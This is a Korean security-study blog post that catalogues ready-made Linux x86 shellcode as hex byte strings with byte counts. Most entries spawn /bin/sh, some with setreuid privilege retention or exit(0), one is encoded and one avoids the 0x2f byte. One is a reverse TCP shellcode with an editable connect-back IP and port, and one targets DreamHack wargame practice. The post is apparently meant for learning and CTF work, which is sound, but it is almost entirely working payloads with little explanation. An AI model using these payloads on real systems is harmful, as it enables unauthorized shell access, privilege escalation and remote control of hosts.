공부/Reverse Engineering

Shellcode

2021. 2. 16. 00:58
728x90
반응형

0x01. 가장 기본적으로 쉘을 띄우는 코드

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

bytes : 25

미포함 : setreuid(), exit()

 

0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

bytes : 31

미포함 : setreuid()

 

0x03. setreuid(geteuid(), getreuid())  까지 포함시킨 쉘 코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

bytes : 41

 

0x03. setreuid(geteuid(), getreuid()), exit(0) 까지 포함시킨 쉘 코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

bytes : 47

 

0x04. exit(0) 코드

\x31\xc0\xb0\x01\xcd\x80

bytes : 6

 

0x05. setreuid(geteuid(), geteuid()) 코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80

bytes : 16 

 

0x06. Linux/x86 execve /bin/sh shellcode 

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

bytes : 23

 

0x07. linux x86 파일명 shellcode

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

bytes : 48

 

0x08. setreuid(geteuid(), geteuid()) system("/bin/sh") 

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff

bytes : 54

 

0x09. 0x2f가 없는 쉘코드

\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3

 

0x0a Reverse TCP shellcode (84byte)

"\x68"+\
"\xc0\xa8\x7e\x8c"+\        #<-    Client IP_ADDR
"\x5e\x66\x68"+\
"\x1e\x61"+\                #<-    Client Port_ADDR
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"+\
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"+\
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"+\
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"+\
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+\
"\xeb\xce"

 

0x0b Ubuntu 16.04 shellcode (for DreamHack) (len 26)

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"

728x90
반응형

'공부 > Reverse Engineering' 카테고리의 다른 글

중국 세무 프로그램에서 설치되는 백도어(Backdoor)  (0) 2024.06.20
스택(Stack) - sfp / ret  (0) 2021.02.19
Test about Ransomware Behavior by Deactivating Trim in SSD - CryptoShield  (0) 2021.01.08
Dharma, GandCrab, CLOP 동적분석  (0) 2021.01.06
소프트웨어 해킹? Vulnerability  (0) 2020.07.11
'공부/Reverse Engineering' 카테고리의 다른 글
  • 중국 세무 프로그램에서 설치되는 백도어(Backdoor)
  • 스택(Stack) - sfp / ret
  • Test about Ransomware Behavior by Deactivating Trim in SSD - CryptoShield
  • Dharma, GandCrab, CLOP 동적분석
a2sembly
a2sembly
정보보안 블로그!
250x250
반응형
a2sembly
CALL DWORD PTR DS:[a2sembly]
a2sembly
전체
오늘
어제
  • 전체글 (62)
    • MITRE ATT&CK (3)
    • 공부 (47)
      • Reverse Engineering (6)
      • Forensic (9)
      • Network (1)
      • Write-up (17)
      • Programming (5)
      • ETC (6)
      • 정보보안기사 (3)
    • 기타 (4)
    • 스크랩 (7)
    • Threat Intelligence (1)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • 정보보안
  • 드림핵
  • CTF
  • rev-basic
  • 오블완
  • 사고분석
  • lfi
  • webhacking
  • 리버스 엔지니어링
  • 정보보안기사
  • 침해사고
  • 정보기
  • 포렌식
  • 리버싱
  • Dreamhack
  • Pwnable
  • python
  • digital forensic
  • 웹해킹
  • 해킹
  • hacking
  • ATT&CK
  • dreamhack.io
  • MITRE
  • 디지털 포렌식
  • 보안
  • 분석
  • 랜섬웨어
  • WEB
  • 티스토리챌린지

최근 댓글

최근 글

hELLO · Designed By 정상우.
a2sembly
Shellcode
상단으로

티스토리툴바

개인정보

  • 티스토리 홈
  • 포럼
  • 로그인

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.